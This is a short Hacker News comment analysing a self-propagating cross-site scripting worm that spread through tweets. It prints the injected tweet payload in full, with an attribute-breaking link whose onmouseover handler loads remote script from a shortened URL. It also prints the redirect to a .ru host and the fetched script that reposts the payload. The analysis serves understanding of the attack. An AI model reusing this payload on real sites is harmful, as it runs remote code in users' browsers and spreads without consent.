Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I got one with this content:

    http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/
With the URL expanding to:

    http://is.gd/fl9A7
Which is a 301 redirect to:

    http://lexasoft.jino-net.ru/up1415.js
Which has the content:

    $('#status').val("http://t.co/@\"style=\"font-size:999999999999px;\"onmouseover=\"$.getScript('http:\\u002f\\u002fis.gd\\u002ffl9A7')\"/");
    $('.status-update-form').submit();
So at least that one does nothing more than propagate itself, but it would be really easy to write one that's more harmful to users.


Correction: That one does nothing more than execute whatever is at that url. So right now it's only self-propagating.




Consider applying for YC's Fall 2026 batch! Applications are open till July 27.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: